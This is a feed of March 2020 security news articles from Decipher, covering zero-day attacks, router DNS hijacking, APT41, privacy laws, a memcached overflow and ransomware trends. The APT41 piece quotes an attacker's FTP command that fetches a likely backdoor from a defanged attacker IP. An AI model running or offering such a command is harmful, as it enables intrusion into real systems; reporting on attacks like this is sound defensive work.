<![CDATA[The Short, Unhappy Lives of Five Zero Days]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/the-short-unhappy-lives-of-five-zero-days https://duo.com/decipher/the-short-unhappy-lives-of-five-zero-days Fri, 27 Mar 2020 00:00:00 -0400

Attacks that exploit zero day vulnerabilities are magnets for attention and headlines but they are relatively rare and make up a tiny percentage of the overall attack landscape. When those attacks are identified, however, they can provide valuable insights for researchers and security teams about attackers’ tactics and targets of choice.

A number of the large technology companies and smaller independent firms have teams that spend their time specifically looking for exploits against zero days, and Google’s Threat Analysis Group is one of the more active teams in that cohort. The TAG regularly discovers and discloses new vulnerabilities in a variety of applications, including Google’s own Chrome browser and Android mobile operating system. In 2019, TAG came across an unusual pattern of attacks from one adversary that included the use of exploits against several zero days.

“Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities. Finding this many zero-day exploits from the same actor in a relatively short time frame is rare. The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns. The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues,” Toni Gidwani, security engineering manager for TAG, said in a post.

"We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program."

The flaws that this attacker was exploiting included bugs in Internet Explorer, Chrome, Android, and Windows, all of which are prime targets for attackers as they’re all widely deployed. This kind of activity is the hallmark of a state-backed adversary, one with extensive resources, financial backing, technical talent, and time to scope targets and develop tools and exploits. Attackers at that level tend to focus on specific, rather than random, targets and employ a variety of tactics, from the highly sophisticated to the banal.

If attacks exploiting zero days are at the top of that pyramid, phishing would be toward the bottom. But that doesn’t mean phishing is not effective; it absolutely is. And that means attackers will continue to use it, even high-level groups. Google’s TAG also spends a considerable amount of time researching phishing attacks and developing new mitigations and defenses against them. Google has several levels of defense against phishing campaigns, especially those that come from state actors. For the last few years the company has had a system that sends people a warning if Google detects a government-backed phishing or malware attack on their accounts. Google also created its Advanced Protection Program a few years ago, which provides a high level of defense against many attacks, including phishing, with the use of hardware security keys for two-factor authentication.

“In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018. One reason for this decline is that our new protections are working—attackers' efforts have been slowed down and they’re more deliberate in their attempts, meaning attempts are happening less frequently as attackers adapt,” Gidwani said.

“In 2019, one in five accounts that received a warning was targeted multiple times by attackers. If at first the attacker does not succeed, they’ll try again using a different lure, different account, or trying to compromise an associate of their target. We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted.”

<![CDATA[Attackers Target Home Routers With DNS-Changing Hack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attackers-target-home-routers-with-dns-changing-hack https://duo.com/decipher/attackers-target-home-routers-with-dns-changing-hack Thu, 26 Mar 2020 00:00:00 -0400

Attackers are nothing if not opportunistic, and a recently discovered campaign that targets home-office wireless routers and redirects victims to malicious sites that install an information stealer illustrates perfectly just how cynical they can be.

The attacks take advantage of the uncertainty and anxiety surrounding the COVID-19 outbreak to entice victims into installing an app that is disguised as a source of information about the virus from the World Health Organization. The app does nothing of the sort, of course, and instead installs the Oski malware, which steals a wide range of sensitive system and personal information and sends it to a remote server. The theme of cybercrime groups and phishing gangs taking advantage of trending topics or world events is an old one and each new crisis brings out the basest instincts in the attacker population, but this is not a simple phishing campaign. Researchers at Bitdefender uncovered this campaign and found that it has been targeting some models of Linksys routers, and possibly others.

This attack chain begins with an adversary compromising the victim’s home router, likely by brute-forcing the admin credentials. For many models of home wireless routers, the default credentials are widely known and rarely ever changed by individual users, so they make for easy pickings. Once the adversary has a foothold on the router, he changes the default DNS settings to point to servers he controls. This effectively gives the attacker control over what sites the victims will see, regardless of what sites they’re trying to visit. In this case, the attackers redirect victims to a site they control that presents them with the page urging them to install the malicious virus-tracking app. The attack targets a relatively small list of domains, but some of them are highly trafficked, including disney.com and an Amazon subdomain.

This campaign is especially troubling given the number of people who are now working remotely and relying on their home Internet connections.

“What’s interesting is that, by changing the DNS settings on the router, users would actually believe they’ve landed on a legitimate webpage, except that it’s served from a different IP address. For example, when users type “example.com”, instead of the webpage being served from a legitimate IP address, it would be served from an attacker-controlled IP that's resolved by the malicious DNS settings,” Liviu Arsene of Bitdefender said in an analysis of the attack campaign.

“If the attacker-controlled webpage is a spot-on facsimile, users would actually believe they’ve landed on a legitimate webpage, judging from the domain name in the browser’s address bar.”

To add extra layers of legitimacy to the attack, the adversaries also use Bitbucket, a legitimate hosting service, to deliver the malicious payload and cloak the URL by using TinyURL. All of these tricks are designed to take the victim’s attention away from any suspicion that this might be an attack and entice him into downloading the malware.

“In the final stage of the attack a malicious file packed with MPRESS is downloaded. This payload is the Oski stealer that communicates with a C&C server for uploading the stolen information,” Arsene said. “Oski is a relatively new infostealer that seems to have emerged in late 2019. Some of the features that it packs revolve around extracting browser credentials and cryptocurrency wallet passwords, and its creators even brag that it can extract credentials stored in SQL databases of various Web browsers and Windows Registry.”

The initial method of compromise for the routers isn’t certain, but the brute-force method appears to be the most likely scenario. Arsene said Bitdefender has found victims in a number of countries, but the United States, France, and Germany account for the lion’s share.

<![CDATA[Give IT a Break from Software Updates]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/give-it-a-break-from-software-updates https://duo.com/decipher/give-it-a-break-from-software-updates Thu, 26 Mar 2020 00:00:00 -0400

Microsoft said it will pause non-security Windows updates beginning in May as part of its plan to reduce the update pressure on IT and security teams, as they are busy keeping organizations operational during the COVID-19 pandemic. Other software companies are adjusting their release schedules, recognizing that IT and security teams are currently stretched thin.

We have been evaluating the public health situation, and we understand this is impacting our customers," Microsoft wrote in a post to the Windows 10 messaging center. "In response to these challenges we are prioritizing our focus on security updates.

Organizations around the world are instructing employees to work from home in order to keep them from getting sick or spreading the disease to others, but this kind of a rapid shift to a remote workplace requires a tremendous amount of effort and speed. IT has had to field an increased volume of support requests—beginning with procuring the equipment, setting up users with new hardware and software, establishing new processes for users to follow, and assisting users who have trouble with the new procedures.

“Right now, we need to focus on keeping the lights on,” said Dave Lewis, an advisory CISO at Duo. “You do not want to mess with anything.”

Every operating system update and patch has the potential to cause unexpected issues for users and the vast amount of software across the Windows ecosystem, said Jack Mannino, the CEO of application security provider nVisium. IT and security teams have to prioritize what to work on in the current “resource-constrained and logistically challenging environment.

“Addressing security issues and critical bug fixes without interruption ensures that we're not building up significant security and technical debt while we're in the midst of the pandemic,” Mannino said.

It doesn’t make sense to divert the attention and energies of IT and security teams away from supporting users and monitoring for potential security issues to testing and deploying software updates. Installing updates could also inadvertently introduce a problem, such as conflicts with existing software or issue with specific types of hardware, which may not be easy to fix, Lewis said.

In a situation where everything is under a lot of stress, it makes sense to not make any changes. The ramifications may go far beyond just a software change—first responders may find that an option they always use has been moved elsewhere, or renamed to look like something else—and actually cause harm.

Pause Non-Security Updates

When Microsoft said it will pause non-security updates, it was referring to the optional Windows updates, the C and D updates which are released during the third and fourth week of each month. The C and D updates generally contain non-security fixes which are officially released in the cumulative update the following month and are not intended to be distributed to all Windows machines. These optional “preview” updates “contain only non-security updates and are intended to provide visibility and testing of the planned non-security fixes” Microsoft said. The fixes in the optional updates go into the following month’s Patch Tuesday (or as Microsoft prefers to call it, Update Tuesday) release as part of the cumulative update. The point of these updates is to give IT teams the opportunity to test the update earlier and give feedback before they are officially released.

Microsoft released a D update in March for Windows 10 1903 and Windows 10 1909. The C and D updates for April are still expected to happen on schedule.

The security updates, or the B updates, are released on the second Tuesday of the month and will continue its schedule. Microsoft will also continue to issue out-of-band security updates as needed. That should come as a relief for security teams, as Microsoft this week disclosed two zero-day vulnerabilities in the Adobe Type Manager Library, which allows Windows users to render different types of PostScript Type 1 fonts on their devices. Microsoft has seen “limited, targeted attacks” exploiting the vulnerability. The fix may not be part of the next Patch Tuesday (“Update” Tuesday) release in April.

If it is catastrophically necessary, you do it," Lewis said. "If there is an Internet worm going around, you patch it.

A Temporary Pause

Earlier this month, Google’s Chrome team said it would temporarily pause the release of Chrome version 81 and focus their efforts on improving the security and stability of the current version (version 80) of the web browser. Instead of March 17, the new version of the web browser is now expected April 7. Version 82 has been cancelled and its features rolled into version 83, whose release date has been bumped up three weeks, to mid-May.

Following Google’s lead, Microsoft suspended future releases of its Edge web browser. Edge is currently on version 80—and will remain on this version for the foreseeable future and keep version 81 in beta. Microsoft will keep rolling out security updates for version 80.

"We are making this change to be consistent with the Chromium project, which recently announced a similar pause due to adjusted schedules, and out of a desire to minimize additional impact to web developers and organizations that are similarly impacted," Microsoft said at the time.

Apple has not said if it will be making any changes to Safari’s release schedule, although it just rolled out a [hefty security and feature update for macOS Catalina, Safari, iTunes for Windows, iOS, iPadOS, macOS, watchOS, and tvOS. Mozilla has also not said if it plans to delay the release of the next version of Firefox, currently scheduled for April 7.

Challenging Times

While delaying updates and new releases would ease the current workload for IT, the decision to do so may also reflect the challenges the developers themselves were facing. Paul Kinlan, the lead for the developer relations team at Google, noted on Twitter that there were several reasons behind the original decision to not release Chrome version 81, including “lower productivity, worry about asking ecosystem to change, being able to respond quickly when there's an issue.”

Many companies are struggling with productivity and staffing. “Microsoft will be using the resources they have and focus on critical security updates such as zero day vulnerabilities,” said Ray Kelly, principal solutions architect and alliances at WhiteHat Security. “It’s a wise decision at the cost of a potential large update after they are staffed back up.”

<![CDATA[APT41 Campaign Targeted Companies in 20 Countries]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attack-campaign-by-apt41-targeted-companies-in-20-countries https://duo.com/decipher/attack-campaign-by-apt41-targeted-companies-in-20-countries Wed, 25 Mar 2020 00:00:00 -0400

One of the more active Chinese cyberespionage and cybercrime groups recently conducted a widespread attack campaign that targeted companies in banking, defense, technology, and other sectors in at least 20 countries over the last three months.

APT41 began exploiting a handful of publicly known vulnerabilities in widely deployed enterprise and SMB products at the beginning of 2020, starting with a remote code execution flaw in the Citrix Application Delivery Controller and Citrix Gateway devices (CVE-2019-19781), according to researchers at FireEye who have tracked the campaign. The attackers later moved on to exploits for vulnerabilities in Cisco routers and Zoho ManageEngine Desktop Central, all of which had been publicly disclosed prior to the group’s attacks. The campaign targeted organizations around the world, including some in Australia, Canada, France, Japan, the UK and the United States.

This is somewhat unusual activity for APT41, which has an extensive arsenal of internally developed tools and exploits, but attack groups will generally take the path of least resistance and using public exploits qualifies. Last year, for example, FireEye discovered a separate intrusion by APT41 that involved the use of a publicly available exploit for a vulnerability in the Atlassian Confluence application. As in the 2020 campaign, that intrusion involved an initial compromise and then the use of second-stage payloads and backdoors.

The campaign that FireEye discovered this year began toward the end of January and involved the targeting of the Citrix flaw. Those intrusions began about 10 days after some proof-of-concept exploit code for the vulnerability was released.

“The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step,” FireEye researchers said in a report on the campaign.

“Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).”

“It is notable that we have only seen these exploitation attempts leverage publicly available malware."

Interestingly, the APT41 activity against Citrix devices essentially stopped from Feb. 2 through Feb. 19, which coincides with the beginning of the quarantine process in China for the COVID-19 virus. The activity picked up again around Feb. 24, but then the attackers began exploiting a known flaw in the Cisco RV320 routers. The FireEye researchers weren’t able to identify the specific exploit that APT41 used against the routers, but noted that there is a public Metasploit module that includes an exploit for the vulnerability.

Shortly after that attack, the APT41 team began focusing on a zero day vulnerability in a Zoho application at a number of different organizations.

“Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed,” the FireEye report says.

“In the first variation the CVE-2020-10189 exploit was used to directly upload ‘logger.zip’, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.”

In one variation of that attack, APT41 likely used a public PoC exploit as the basis for their operation, while in another the team used a Microsoft tool to download and run a tool from a server known to be operated by APT41. In both cases, the attackers installed a trial version of the Cobalt Strike Beacon threat emulation tool. The attackers then used that tool to download a backdoor

“It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance,” FireEye’s report says.

<![CDATA[California, NY Consumer Privacy Laws Protect Data from Misuse]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/california-ny-consumer-privacy-laws-protect-data-from-misuse https://duo.com/decipher/california-ny-consumer-privacy-laws-protect-data-from-misuse Wed, 25 Mar 2020 00:00:00 -0400

Organizations collecting and maintaining personal information about California and New York residents should be paying attention to what is happening with the states’ consumer privacy laws.

The data security elements of New York’s Stop Hacks and Improve Electronic Data Security Act went into effect on March 21. Ten days earlier, the California Attorney General released a second modification of the proposed regulations to implement the California Consumer Protection Act (CCPA). Both of these laws strengthen consumer privacy by focusing on how organizations use and protect the personal data they collect.

New York’s SHIELD Act, which was signed into law last July, broadens the scope of consumer privacy by requiring organizations to protect the information they collect and by expanding the types of data which are subject to the data breach notification law. The law also broadened the definition of a data breach to include unauthorized access to private information. Most of the law’s provisions took effect on Oct. 23, 2019, and the data security portion was the only one left.

Often compared to European Union’s General Data Protection Regulation (GDPR), CCPA gives consumers control over what data is collected, processed, shared, or sold by companies doing business in California. As a state law, CCPA’s rules protecting consumers from having their personal data being used improperly applies only to California, but the sheer size of the state’s economy and number of residents means most organizations have to comply. CCPA went into effect Jan. 1 and is currently the strongest consumer privacy law on the books among the fifty states (and absent a federal law).

Like CCPA, the SHIELD Act’s reach extends beyond New York’s borders because it applies to any organization with any information about any New York resident. It doesn’t require the business to operate in New York.

SHIELD’s Stipulations

The SHIELD Act established minimum security requirements for all organizations (“persons and entities”), both for-profit and non-profit, that hold protected data. If this type of data, which includes Social security numbers; driver’s license numbers or non-driver identification card numbers; account numbers and payment card numbers; passwords and security codes associated with financial accounts; biometric information such as fingerprints, voice prints, retina or iris image; and usernames and email addresses, along with corresponding passwords and security questions and answers, gets exposed in a data breach or some other incident, the entity has to report it to the attorney general.

Organizations possessing protected data would be considered in compliance if they implement data security practices with reasonable administrative, technical, and physical safeguards. These include having a written security program with reasonable administrative safeguards such as training employees on appropriate security procedures and selecting service providers that follow secure practices, along with technical safeguards such as regular testing and monitoring of essential controls, systems and procedures. The law requires physical safeguards such as disposing of private information and securely erasing electronic media. The SHIELD Act also requires that any entity collecting data has to have a designated employee to oversee the security program.

Small businesses—with less than $3 million in annual revenue, less than $5 million in assets, or fewer than 50 employees—will be considered in compliance if they have the same kind of administrative, technical or physical safeguards "appropriate for the size and complexity of the small business, the nature, and scope of the small business's activities, and the sensitivity of the personal information the small business collects from or about consumers."

Most entities already compliant with Health Insurance Portability and Accountability Act (HIPAA), Graham-Leach-Bliley Act, or New York Department of Financial Services cybersecurity regulations most likely already comply with the SHIELD Act, wrote Curtis A. Johnson, an attorney in the Cybersecurity and Data Privacy at law firm Bond, Schoeneck & King PLLC. There is no certification process to show the organization is complying with the SHIELD Act. However, if there is a data breach and it turns up during the investigation that the organization was not compliant, the organization may face civil penalties of up to $5,000 per violation and no penalty caps.

Current CCPA Changes

As for CCPA, the proposed regulations on how to implement the law were released in October, and the California Attorney General released a set of modifications in February. The second modifications are in response to the comments received on the February rules. While some of the changes in the second modifications are new, some reversed the changes that were introduced in the first modification.

The modifications do not change the overall structure of the proposed regulations, and there is no major change to the main requirement that businesses have to notify the consumer at the “point of collection” about what information is being collected, how it will be used, and where to find the privacy policy. There is a minor tweak in how the notification is presented, however, as businesses collecting the personal information over the telephone or in person can notify the consumer verbally. And in cases where the information is being collected for employment purposes, the business doesn’t have to provide a link to the privacy policy.

The modifications expand the types of information to include in the privacy policy. For example, the privacy policy must identify the categories of sources from which personal information is collected, and the categories have to be described in a way that consumers will understand. This is in line with the original regulations. Another change requires that businesses selling information must identify the commercial purpose the data will be used for--or the business they are selling to—”in a manner that provides consumers meaningful understanding of why the information is collected or sold.”

If the business receives a request to know a consumer’s Social Security number, driver’s license number or other government-issued identification number, it does not have to disclose what it knows. However, the business still has to inform the consumer that it collected that type of information. “For example, a business shall respond that it collects ‘unique biometric data including a fingerprint scan’ without disclosing the actual fingerprint scan data.”

A business that does not collect personal information directly from consumers does not need to notify the consumer about having the data only if the business does not sell the personal data. But if a business that sells consumer data denies a consumer’s deletion request and the consumer has not already made a request to opt-out of the sale, then the business must ask the consumer again if the consumer wants to opt-out.

Don’t Delay

Businesses are expected to be compliant with CCPA by July 1, when enforcement will begin. The California Attorney General is making these modifications in response to public input, and the final regulations are expected to be complete before then. However, it can be difficult for businesses making the necessary changes to be compliant with the law when the rules keep changing.

Organizations should be implementing good security hygiene, conducting thorough asset inventories, and strengthening their security practices—all of which will help meet SHIELD’s requirements to have safeguards in place— in order to avoid civil penalties under the laws. Businesses should be encrypting their data in order to comply with CCPA, according to California Consumer Privacy Compliance Guide from IT analyst and research firm Enterprise Strategy Group. If data has been encrypted or redacted, it cannot be used by unauthorized parties, so even in the case of a breach the consumer is not harmed. Data protection applies to data at rest in storage, in transit over networks, and while in use by applications, according to the Guide.

“Organizations need to implement advanced data classification, data anonymization, data masking, encryption, security, and access controls in order to set themselves up for successful compliance,” wrote Christophe Bertrand, ESG senior analyst.

Many organizations are “only ready on the surface,” such as implementing the opt-in/opt-out mechanism for marketing materials, and have not acted on the data protection elements, Bertrand said.

A business group asked the California Attorney General to postpone enforcement of CCPA because of concerns over making the necessary changes when many employees are working remotely and adjusting to new processes. “Developing innovative business procedures to comply with brand-new legal requirements is a formidable undertaking on its own, but it is an especially tall order when there are no dedicated, on-site staff available to build and test necessary new systems and processes,” the letter said.

While the attorney general’s office has not yet responded to the request, privacy advocates pushed back, noting that organizations have had almost a full year to make the changes.

“[Industry] shouldn’t exploit the health crisis to ignore consumer requests to companies to stop selling their data,” said Justin Brookman, director of privacy and technology policy at Consumer Reports.

“Now that more consumers are working from home and relying on tech companies for crucial communications, the attorney general needs to ensure that appropriate safeguards are in place,” said Maureen Mahoney, a policy analyst at Consumer Reports.

Organizations should not expect a postponement and do what needs to be done to ensure they are complying with the law. This is not the time to be lax about compliance. In fact, with the workforce working remotely and using alternate (unfamiliar) tools, proper data management and protection is more important than ever.

As for SHIELD, “New York State has not delayed implementation in the face of the statewide and national emergencies declared as a result of the COVID-19 pandemic,” said Johnson.

<![CDATA[Buffer Overflow in Memcached Fixed]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/buffer-overflow-in-memcached-fixed https://duo.com/decipher/buffer-overflow-in-memcached-fixed Tue, 24 Mar 2020 00:00:00 -0400

The maintainers of the popular memcached open source distributed memory caching tool have quickly resolved a remote denial-of-service vulnerability that was disclosed publicly Monday, along with proof-of-concept exploit code.

The bug is caused by a buffer overflow in the memcached code and if an attacker can supply a long enough value as the buggy parameter, the application will crash. On Monday, someone posted the details of the vulnerability and the PoC code to GitHub, which was apparently the first indication that the application’s maintainers got about the issue. The bug affects versions 1.6.0 and 1.6.1.

“In line 6179, since there is no mechanism to verify the parameter's length, in this case, the length of "extlen" when calling memcpy function, It will cause buffer overflow if large value assigned to the extlen variable,” the bug disclosure says.

“We can construct a very large data packet and send it to the server running memcached 1.6.0 or 1.6.1 anonymously. After that, the program will crash because of the issue mentioned above.”

Memcached has been in use for more than 15 years and is used in a number of environments. It’s designed to help web apps run faster by sharing memory and it can allocate memory from places that have too much to areas that don’t have enough.

Within a few hours of the issue surfacing on GitHub, one of the maintainers of memcached had released a new version that fixes the DoS vulnerability, version 1.6.2. The maintainer seemed none too pleased with the public disclosure of the vulnerability.

“I've been responsive to security reports (or even report them myself) and give credit happily when due for over ten years. Don't waste my good will, please,” the maintainer, Dormando, said in a comment on the bug disclosure.

<![CDATA[Insurers See Ransomware Claims More Than Double]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/insurers-see-ransomware-claims-more-than-double https://duo.com/decipher/insurers-see-ransomware-claims-more-than-double Tue, 24 Mar 2020 00:00:00 -0400

Ransomware attacks are on the rise, with one insurance company seeing the number of customer claims more than double in 2019. The spike in attacks were most evident in healthcare, professional services, and financial services.

The number of ransomware attack notifications against customers of London-based insurance company [Beazley Group](https://www.beazley.com] more than doubled in 2019 compared to 2018, Beazley Breach Response (BBR) Services, the insurer’s in-house breach response team, said in its Beazley Breach Briefing](https://www.beazley.com/news/2020/beazley_breach_briefing_2020.html). The increase is also dramatic: There were 775 incidents in 2019, a 131 percent increase from 2018, a 20 percent increase in 2018 compared to 2017, and a 9 percent increase in 2017 compared to 2016.

“Until four years ago reports from our policyholders of ransomware attacks were infrequent,” said the Beazley Breach Briefing. Back then, a ransomware attack typically did not also include data exfiltration, where the files were copied to a remote server. That is increasingly no longer the case. “Today, however, not only has the frequency of ransomware attacks increased substantially, but the added threat of a data breach makes them potentially much more damaging,” the report said.

More Ransomware

The figures from Beazley Breach Response Services are useful towards understanding the magnitude of the ransomware problem. Many ransomware victims don’t publicly disclose they’ve been impacted by ransomware attack, and even fewer notify law enforcement. This reticence makes it difficult to get an accurate picture of whether these attacks are becoming more common or not. Even in cases where the victims report the ransomware attack to the public, they often decline to divulge the amount of ransom asked for, or paid.

There is no doubt ransomware attacks are on the rise. Trend Micro reported a 10 percent increase in ransomware detections in 2019 in its Annual Threat Report 2019, and that the healthcare sector was the most targeted industry, with more than 700 providers impacted. The figures were even higher from Kaspersky, which reported a 60 percent increase in ransomware attacks in 2019 compared to 2018. Ransomware targeted 174 municipalities and 3,000 of its sub-organizations in 2019, Kaspersky said.

Government organizations were the “intended victims of nearly two-thirds of all ransomware attacks,” Barracuda said back in August.

Insights from insurers like Beazley that see ransomware infections that may not otherwise be reported help illustrate the situation. According to the Beazley Breach Briefing, the healthcare sector was hardest hit in 2019, accounting for 35 percent of attack reports. These included direct attacks against hospitals, health systems, and other covered entities, as well as attacks on IT vendors providing services to hundreds of dental and nursing home facilities. Financial companies were second most impacted, at 16 percent, followed by educational institutions at 12 percent, and professional services organizations at 9 percent, said the Beazley Breach Briefing.

The report included ransomware incidents where the customer wasn’t the actual target, but had its operations disrupted because its IT provider or other third-party entity was infected. In those cases, these attacks had a wider impact, because they affected many of the provider’s customers, not just a single victim. About 17 percent of attacks in Beazley Breach Briefing involved these third-party organizations.

"The targets of these attacks were not coincidental; criminals calculate the odds of receiving a ransom payment from an attacked MSP whose entire customer base and business could dissipate due to an attack," the Beazley Breach Breifing said.

Ransomware attacks against large and well-known organizations are more likely to be reported and talked about. But about three-fifths of the victims, or 62 percent, in Beazley’s data were small and medium-sized businesses. These are often the organizations that are frequently undercounted because they are small enough to not have to disclose the attacks.

Products and services with a large market share are likely ransomware targets. Communication devices, smart TVs, and cloud-based security and monitoring tools, “as they have a very larger attacks surface,” the Briefing said.

Attackers’ Entry Points

One reason why there are more attacks is because there are more ransomware strains than there used to be. The availability of ransomware strains such as Ryuk and Sodinokibi means it is easier for attackers to get started on their campaigns. Another reason is because employees are falling for phishing scams and organizations are still struggling to secure remote desktop protocol (RDP) properly. RDP allows employees to remotely access their corporate workstations and servers. However, many RDP systems can be found by scanning for IP addresses, and are generally are unprotected. Many organizations don’t bother assigning a password to RDP, or use a weak and/or compromised password, “giving a brute-force attack a high probability of success.” RDP is not always updated in a timely manner, and there are many recently discovered vulnerabilities which would allow someone to have unauthenticated access to the target computer.

Once in the network, the attacker can move around to infect additional systems and potentially steal information.

While protections such as email filters, multi-factor authentication, strong password policies to prevent recycled passwords, and employee training to recognize and report suspicious messages can help thwart phishing, “few of these solutions are broadly implemented,” Beazley Breach Response Services wrote. Similarly, requiring a virtual private network and using IP whitelisting to restrict who can connect via RDP can help mitigate the risks of someone unauthorized getting on the network.

Criminals are also combining ransomware with other attach techniques, such as breaching the network with the TrickBot banking Trojan and then encrypting the files with ransomware.

More and more attackers are using ransomware alongside other types of malware to steal and exfiltrate sensitive information. Criminals are also combining ransomware with other attach techniques, such as breaching the network with the TrickBot banking Trojan and then encrypting the files with ransomware, said Katherine Keefe, Beazley’s head of breach response services.

“This two-pronged attack leaves organizations not only with the debilitating impact of its critical systems and data being encrypted, but with the added risk of data being accessed or stolen,” Keefe said.

While protections such as email filters, multi-factor authentication, strong password policies to prevent recycled passwords, and employee training to recognize and report suspicious messages can help thwart phishing, “few of these solutions are broadly implemented,” Beazley Breach Response Services wrote. Similarly, requiring a virtual private network and using IP whitelisting to restrict who can connect via RDP can help mitigate the risks of someone unauthorized getting on the network.

Other recommendations include updating PowerShell to the latest framework and disabling PowerShell where not needed, automated patching of the operating system and web browsers, web filtering, and limiting administrative rights to only IT staff and not regular users.


The insurance industry is in the early stages of assessing risk and figuring out how to write policies for ransomware attacks. The insurer may assist with the forensic investigation, developing a course of action, and negotiating the ransom. The entire point of the insurance policy is to help the company resume normal operations as quickly as possible, said Stephen Boyer, CTO of security ratings company BitSight.

“As soon as possible” is the key phrase. There is a false assumption that paying the ransom immediately restores data and business operations. Paying the ransom only helps with getting the data back, the Briefing said, citing Bill Siegel, CEO of Coveware, a security company which helps victims negotiate with attack groups. According to Siegel, the organization still has to clean the affected systems, remediate the vulnerability which allowed the machine to get infected and to spread through the network.

“The process of remediating and ensuring the network is safe to use often takes much longer than the actual decryption of data,” the Briefing said. “In Coveware’s experience, restoring from backups is always faster than ransom payment as a means to recover even though it may seem like a time-consuming process.”

Paying the ransom isn’t always faster, but it can be cheaper than restoring from backups, but not by that much. Consider the city of Atlanta, which wound up spending at least $2.6 million to restore its systems rather than paying the $52,000 ransom. However, the ransom isn’t the only cost of recovery. The organizations still has other expenses, such as paying for the work performed by forensics investigators, costs associated with crisis communications, and overtime for its security and IT staff who cleaned the infection and repaired the vulnerabilities. Organizations that choose to pay the ransom are relying on their insurance providers to help cover the costs.

There is a perception that insurance providers don’t pay out security claims, but that is false, said Stephen Boyer, CEO of security ratings company Bitsight. Most insurance cover costs of cyberattacks for policyholders, especially in cases of BEC scams and ransomware, Boyer said.

It didn’t help matters when various insurance companies declined Merck’s claims relating to costs incurred by NotPetya, classifying the malware as “an act of war.” Within insurance circles, the decision to deny the claims was a controversial one, with some insurers believing that the “act of war” exclusion was used inappropriately, Boyer said.

The Beazley Briefing had a sobering conclusion: “ransomware is not going away any time soon.” The attacks are “far too successful and profitable for cyber criminals to shift course.”

<![CDATA[Decipher Podcast: Wade Baker and David Severski]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-wade-baker-and-david-severski https://duo.com/decipher/decipher-podcast-wade-baker-and-david-severski Mon, 23 Mar 2020 00:00:00 -0400

<![CDATA[Unpatched Windows Flaws Under Active Attack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/unpatched-windows-flaws-under-active-attack https://duo.com/decipher/unpatched-windows-flaws-under-active-attack Mon, 23 Mar 2020 00:00:00 -0400

Microsoft is warning customers about two newly discovered remote code execution vulnerabilities in Windows that are related to the Adobe Type Manager that are under active attack right now.

The vulnerabilities affect most of the currently supported versions of Windows desktop and server and Microsoft has rated the bigs as critical for all of the affected releases. The company said that it is aware of some targeted attacks that are exploiting these vulnerabilities, making them quite dangerous for end users and enterprises. Attackers could exploit the flaws in a couple of ways, including through a simple malicious Office document.

Microsoft is working on patches, but the next scheduled release would not be until April 14.

“Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released,” the Microsoft advisory says.

“Two remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.”

The Adobe Type Manager is a font-management library that has been in use in macOS and Windows for many years. Although the vulnerabilities are rated critical in all of the affected versions, they may have different outcomes on different versions. For example, on Windows 10 a successful attack would only grant the attacker limited privileges as it would be within the context of an AppContainer sandbox.

Although there is no patch available for these flaws, there are some workarounds that can mitigate the effects of the most dangerous exploits against them. Disabling the Preview Pane Details and Web Client services in Windows can be useful workarounds.

“Disabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability,” the advisory says.

The second mitigation, turning off the WebClient service, provides an even better mitigation of the flaws.

“Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet,” the advisory says.

<![CDATA[New Security Tools Added to Google's Advanced Protection]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-security-tools-added-to-googles-advanced-protection https://duo.com/decipher/new-security-tools-added-to-googles-advanced-protection Thu, 19 Mar 2020 00:00:00 -0400

Google is adding a new suite of defensive tools to its Advanced Protection Program to help prevent malicious apps from finding their way onto Android devices.

